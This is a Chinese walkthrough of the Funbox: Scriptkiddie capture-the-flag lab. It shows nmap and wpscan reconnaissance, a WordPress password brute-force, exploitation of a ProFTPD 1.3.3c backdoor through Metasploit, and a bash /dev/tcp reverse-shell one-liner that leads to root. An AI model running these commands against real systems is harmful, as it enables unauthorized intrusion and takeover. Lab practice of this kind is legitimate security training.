靶机:Funbox: Scriptkiddie

一、信息收集

1. 获取靶机IP

(在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件)

靶机:Funbox: Scriptkiddie_第1张图片

 2. 扫描端口

 nmap -sC -sV 192.168.8.144

靶机:Funbox: Scriptkiddie_第2张图片

靶机:Funbox: Scriptkiddie_第3张图片

 3. 进入web页面

靶机:Funbox: Scriptkiddie_第4张图片

4. 扫目录

发现网站是wordpress搭建的

靶机:Funbox: Scriptkiddie_第5张图片

靶机:Funbox: Scriptkiddie_第6张图片

二、漏洞利用&提权

1. 用wpscan扫描

1)枚举用户名

wpscan --url http://192.168.8.144/ --enunerate u

用户名有admin

靶机:Funbox: Scriptkiddie_第7张图片

2)爆破密码

wpscan --url http://192.168.8.144/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 5

爆了好久没结果

 2. 查看下端口协议是否有漏洞

searchsploit ProFTPD 1.3.3c

 3. 用msfconsole框架

用 unix/ftp/proftpd_133c_backdoor

设置靶机和kali的IP

设置payload

serach ProFTPD 1.3.3c 

use exploit/unix/ftp/proftpd_133c_backdoor

show options

set RHOSTS 192.168.8.144

show payloads

set payload payload/cmd/unix/reverse

show options

set LHOST 192.168.8.142

exploit

靶机:Funbox: Scriptkiddie_第8张图片

得到一个root权限

4. shell反弹

在kali开启一个监听

靶机:Funbox: Scriptkiddie_第9张图片

构造一个payload:

bash -c 'bash -i >& /dev/tcp/192.168.8.142/6666 0>&1'

在msf中执行

kali获取root权限

靶机:Funbox: Scriptkiddie_第10张图片

获取flag:

靶机:Funbox: Scriptkiddie_第11张图片

你可能感兴趣的:(安全)